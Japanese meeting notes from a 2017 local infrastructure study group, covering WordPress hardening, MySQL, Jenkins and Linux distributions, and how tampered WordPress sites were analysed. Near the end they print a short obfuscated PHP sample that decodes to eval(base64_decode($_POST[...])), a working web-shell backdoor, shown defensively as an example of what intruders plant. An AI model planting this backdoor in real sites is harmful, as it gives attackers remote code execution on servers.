--- title: 加古川IT系インフラ勉強会 2017.09 langs: ja-jp GA: UA-39104128-6 --- 加古川IT系インフラ勉強会 2017.09 === * 開催日：2017/09/09 * 司会：wate * 参加者数：参加者: 6名 / 学生: 0名 / Hangout: 1名 * 備考：気付いたことなど、自由に記入をお願いします！ * Connpass: https://histudy.connpass.com/event/66082/ * ハッシュタグ：#kakogawa_infra --- ## 脆弱性 * MySQLの不満あれこれ * いつの間にかテーブルサイズが肥大化する * プラグインによっては、wp_options テーブルが肥大化。。。 * 「汎用化」に振りすぎ？ * Wordpressのセキュリティ対策 * REST APIで脆弱性が増えたかも * パーミッションに注意 * セーフモードは既に意味なさげ * プラグインを制限する * 接続元を国内限定にする(かなり効いた) * ファイルのチェックサムを取る * gitで管理する * WPScanかける * ...のような面倒な作業はJenkinsに任せたい(LDAPサーバどうしよう) * Jenkinsによる自動化とか勉強会やってみたい * Jenkins2.0でPipelineが導入された。便利そう * うちのインフラ部門がAmazon Linux大好きなので、最近そちらやってます * Debian慣れしてるので、Amazon Linux 気持ち悪い * RedHatに似てるが、バージョンをがんがんあげるので互換性に不安 * CentOS めんどくさい * 7に移行中です * 7になれてない人大丈夫？ * やはりサーバは2-3年で更新しないと * クラウドで管理はだいぶ楽になった * Shell Scrptでちまちま管理してましたがAnsibleでOK * OpenStackまわりとかやってみたいね(ConoHaとか) * Vineなつかし。MecabはまだUTF-8がデフォルトじゃないのかしら * 幸いWordPressの闇はまだ見たことないです * Webの勉強会開催は難しい? * 勉強会のフォームを用意して、「あとはよろしくね」というメソッドが有効? * WordBench姫路開催の予感 * WordBench京都、大阪、神戸の所感もげもげ * サーバ管理ネタをWordBenchあたりで話してみる? * 管理者の視点で言えることとか * サーバアプリケーションの脆弱性対応は、業者ではやりにくい(検閲とかに該当) * WordPress改竄スクリプトの解析とかやってるところもあります * 改竄コードの例 * $dataという変数に、あらかじめbase64でエンコードしておいた生データをデコード、代入している * $dataをそのままeval、とかやってそう * 怪し気なzipファイルを展開している * zipファイル展開確認。フィッシングサイトを開設するとおぼしきphpのコード一式が入っていた * おそらく同時に撒いたであろうspamにここのURLが入ってるはず * ACLファイルを入れ替えられてるも * Fail2banをSMTPなどにも入れている * sshアクセスはWebからのアクセス元のみに限定する * FollowSymlinkの禁止を導入したが、一部ツールはこれに依存していたりする * JavaScriptの脆弱性 * 難読コード(昔の一例) ```php <?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]); $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[0]);if (isset(${$s20}['nd335c3'])) { eval($s21(${$s20}['nd335c3'])); } ?> ``` * * * * * * * * * * *